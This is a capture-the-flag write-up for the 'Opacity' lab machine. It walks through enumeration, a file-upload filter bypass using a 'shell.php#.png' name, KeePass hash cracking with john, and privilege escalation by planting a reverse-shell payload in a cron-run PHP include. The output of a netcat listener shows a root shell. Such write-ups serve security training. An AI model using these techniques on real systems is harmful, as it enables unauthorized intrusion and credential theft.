Opacity

File upload Bypass - KeePass Cracking - CronJob PrivEsc

Port Scanning

Starting off with the nmap scan

22/tcp  open  ssh         syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0fee2910d98e8c53e64de3670c6ebee3 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCa4rFv9bD2hlJ8EgxU6clOj6v7GMUIjfAr7fzckrKGPnvxQA3ikvRKouMMUiYThvvfM7gOORL5sicN3qHS8cmRsLFjQVGyNL6/nb+MyfUJlUYk4WGJYXekoP5CLhwGqH/yKDXzdm1g8LR6afYw8fSehE7FM9AvXMXqvj+/WoC209pWu/s5uy31nBDYYfRP8VG3YEJqMTBgYQIk1RD+Q6qZya1RQDnQx6qLy1jkbrgRU9mnfhizLVsqZyXuoEYdnpGn9ogXi5A0McDmJF3hh0p01+KF2/+GbKjJrGNylgYtU1/W+WAoFSPE41VF7NSXbDRba0WIH5RmS0MDDFTy9tbKB33sG9Ct6bHbpZCFnxBi3toM3oBKYVDfbpbDJr9/zEI1R9ToU7t+RH6V0zrljb/cONTQCANYxESHWVD+zH/yZGO4RwDCou/ytSYCrnjZ6jHjJ9TWVkRpVjR7VAV8BnsS6egCYBOJqybxW2moY86PJLBVkd6r7x4nm19yX4AQPm8=
|   256 9542cdfc712799392d0049ad1be4cf0e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAqe7rEbmvlsedJwYaZCIdligUJewXWs8mOjEKjVrrY/28XqW/RMZ12+4wJRL3mTaVJ/ftI6Tu9uMbgHs21itQQ=
|   256 edfe9c94ca9c086ff25ca6cf4d3c8e5b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINQSFcnxA8EchrkX6O0RPMOjIUZyyyQT9fM4z4DdCZyA
80/tcp  open  http        syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-title: Login
|_Requested resource was login.php
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
139/tcp open  netbios-ssn syn-ack Samba smbd 4.6.2
445/tcp open  netbios-ssn syn-ack Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: -1s
| nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
|   OPACITY<00>          Flags: <unique><active>
|   OPACITY<03>          Flags: <unique><active>
|   OPACITY<20>          Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   0000000000000000000000000000000000
|   0000000000000000000000000000000000
|_  0000000000000000000000000000
| smb2-time: 
|   date: 2023-06-06T07:00:33
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 29246/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 6171/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 20231/udp): CLEAN (Failed to receive data)
|   Check 4 (port 32869/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

Let's make some mental notes :)

  • SSH isn't vulnerable

  • SMB ports are intersting

  • HTTP enumeration is required, most-likey to get the initial foothold

SMB Enumeration

$ smbclient -L \\\\10.10.157.10\\                                                             20.2s _ Tuesday 06 June 2023 12:33:16 PM
Password for [WORKGROUP\cash]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (opacity server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
$ crackmapexec smb 10.10.157.10 -u 'anonymous' -p 'anonymous' --shares                       4160ms _ Tuesday 06 June 2023 12:33:36 PM
SMB         10.10.157.10    445    OPACITY          [*] Windows 6.1 Build 0 (name:OPACITY) (domain:) (signing:False) (SMBv1:False)
SMB         10.10.157.10    445    OPACITY          [+] \anonymous:anonymous 
SMB         10.10.157.10    445    OPACITY          [+] Enumerated shares
SMB         10.10.157.10    445    OPACITY          Share           Permissions     Remark
SMB         10.10.157.10    445    OPACITY          -----           -----------     ------
SMB         10.10.157.10    445    OPACITY          print$                          Printer Drivers
SMB         10.10.157.10    445    OPACITY          IPC$                            IPC Service (opacity server (Samba, Ubuntu))
$ impacket-lookupsid 'opacity.thm/anonymous@10.10.157.10' -no-pass | tee users.txt             9.8s _ Tuesday 06 June 2023 12:36:31 PM
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.157.10
[*] StringBinding ncacn_np:10.10.157.10[\pipe\lsarpc]
[-] nca_s_op_rng_error
$ smbmap -H 10.10.157.10                                                                     4032ms _ Tuesday 06 June 2023 12:37:38 PM
[+] IP: 10.10.157.10:445        Name: opacity.thm                                       
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        IPC$                                                    NO ACCESS       IPC Service (opacity server (Samba, Ubuntu))

Therefore, SMB is of no use to us !

HTTP Enumeration

On visiting the webpage, it redirects us to the login page - login.php

Let's look for some hidden directories

[12:39:41] 403 -  276B  - /.ht_wsr.txt
[12:39:41] 403 -  276B  - /.htaccess.bak1
[12:39:41] 403 -  276B  - /.htaccess.orig
[12:39:41] 403 -  276B  - /.htaccess.sample
[12:39:41] 403 -  276B  - /.htaccess.save
[12:41:04] 301 -  310B  - /cloud  ->  http://opacity.thm/cloud/
[12:41:04] 200 -  639B  - /cloud/
[12:41:13] 301 -  308B  - /css  ->  http://opacity.thm/css/
[12:41:54] 200 -  848B  - /login.php
[12:42:38] 403 -  276B  - /server-status
[12:42:38] 403 -  276B  - /server-status/

The /cloud directory looks interesting, on visiting that endpoint

We can get to know that its a file-upload functionality page........which takes a URL as an input and fetches image

  • We can quickly set a python http server and host a jpeg file to know that applications functionality - Returns 200 OK

  • If we try to upload a .php file, it denies :(

So the backend is validating on extensions, inorder to bypass this we can rename shell.php to shell.php#.png

Looking at the www-data's home directory, we can find some creds from the login.php source code

Let’s log in to the website via the credential we got, we can even try password spraying on the users - sysadmin and root, but nothing worked ;(

Lateral Move => Sysadmin

Since we got to a dead end I started looking around, and I found the dataset.kdbx in the /opt folder - Transferred it to our machine and analyzed it using the file command

  • It seems to be a KeePass database file, we can easily crack it via john

$ keepass2john dataset.kdbx > keepasshash.txt
$ john keepasshash.txt --wordlist=/opt/rockyou.txt
Using default input encoding: UTF-8                                                                                                              
Loaded 1 password hash (KeePass [SHA256 AES 32/64])                                                                                              
Cost 1 (iteration count) is 100000 for all loaded hashes                                                                                         
Cost 2 (version) is 2 for all loaded hashes                                                                                                      
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes                                                                         
Will run 4 OpenMP threads                                                                                                                        
Press 'q' or Ctrl-C to abort, almost any other key for status                                                                                    
741852963        (dataset)                                                                                                                       
1g 0:00:00:09 DONE (2023-06-06 13:26) 0.1015g/s 89.34p/s 89.34c/s 89.34C/s chichi..david1                                                        
Use the "--show" option to display all of the cracked passwords reliably                                                                         
Session completed.

We can use the KeePass2 GUI functionality to open the database file

We can now SSH into the box as sysadmin :)

Privilege Escalation => Root

Since we are a stable user now we can cat the local.txt

Let's start enumerating from here, the scripts directory looks interesting !

sysadmin@opacity:~$ cd scripts/                                                                                                                  
sysadmin@opacity:~/scripts$ ls                                                                                                                   
lib  script.php                                                                                                                                  
sysadmin@opacity:~/scripts$ 
sysadmin@opacity:~/scripts$ cat script.php 
<?php

//Backup of scripts sysadmin folder
require_once('lib/backup.inc.php');
zipData('/home/sysadmin/scripts', '/var/backups/backup.zip');
echo 'Successful', PHP_EOL;

//Files scheduled removal
$dir = "/var/www/html/cloud/images"; 
if(file_exists($dir)){
    $di = new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS);
    $ri = new RecursiveIteratorIterator($di, RecursiveIteratorIterator::CHILD_FIRST);
    foreach ( $ri as $file ) {
        $file->isDir() ?  rmdir($file) : unlink($file);
    }
}
?>

So the script.php requires another file called backup.inc.php which is in the /lib

sysadmin@opacity:~/scripts/lib$ ls -lahs
total 132K
4.0K drwxr-xr-x 2 sysadmin root 4.0K Jul 26  2022 .
4.0K drwxr-xr-x 3 root     root 4.0K Jul  8  2022 ..
 12K -rw-r--r-- 1 root     root 9.3K Jul 26  2022 application.php
4.0K -rw-r--r-- 1 root     root  967 Jul  6  2022 backup.inc.php
 24K -rw-r--r-- 1 root     root  24K Jul 26  2022 bio2rdfapi.php
 12K -rw-r--r-- 1 root     root  11K Jul 26  2022 biopax2bio2rdf.php
8.0K -rw-r--r-- 1 root     root 7.5K Jul 26  2022 dataresource.php
8.0K -rw-r--r-- 1 root     root 4.8K Jul 26  2022 dataset.php
4.0K -rw-r--r-- 1 root     root 3.2K Jul 26  2022 fileapi.php
4.0K -rw-r--r-- 1 root     root 1.3K Jul 26  2022 owlapi.php
4.0K -rw-r--r-- 1 root     root 1.5K Jul 26  2022 phplib.php
 12K -rw-r--r-- 1 root     root  11K Jul 26  2022 rdfapi.php
 20K -rw-r--r-- 1 root     root  17K Jul 26  2022 registry.php
8.0K -rw-r--r-- 1 root     root 6.8K Jul 26  2022 utils.php
4.0K -rwxr-xr-x 1 root     root 3.9K Jul 26  2022 xmlapi.php

All the files are owned by root here, let's try copying the backup file from lib directory to our home directory so that we can edit it

sysadmin@opacity:~/scripts/lib$ cp backup.inc.php ../                                                                                            
cp: cannot create regular file '../backup.inc.php': Permission denied                                                                            
sysadmin@opacity:~/scripts/lib$ cp backup.inc.php ../../                                                                                         
sysadmin@opacity:~/scripts/lib$ cd ..                                                                                                            
sysadmin@opacity:~/scripts$ ls                                                                                                                   
lib  script.php                                                                                                                                  
sysadmin@opacity:~/scripts$ cd ..                                                                                                                
sysadmin@opacity:~$ ls                                                                                                                           
backup.inc.php  local.txt  scripts

We'll now remove the duplicate file which is in the /lib directory - now we'll have to insert our php reverse payload and put it back where it was and wait till the cron executes it

$ rlwrap nc -nlvp 9999                                                                                Tuesday 06 June 2023 01:39:37 PM
listening on [any] 9999 ...
connect to [10.8.74.51] from (UNKNOWN) [10.10.157.10] 43978
Linux opacity 5.4.0-139-generic #156-Ubuntu SMP Fri Jan 20 17:27:18 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 08:10:02 up  1:12,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
sysadmin pts/1    10.8.74.51       08:00   10.00s  0.12s  0.12s -bash
uid=0(root) gid=0(root) groups=0(root)
sh: 0: can't access tty; job control turned off
# whoami
root
PreviousInfernoNextMarket Place

Last updated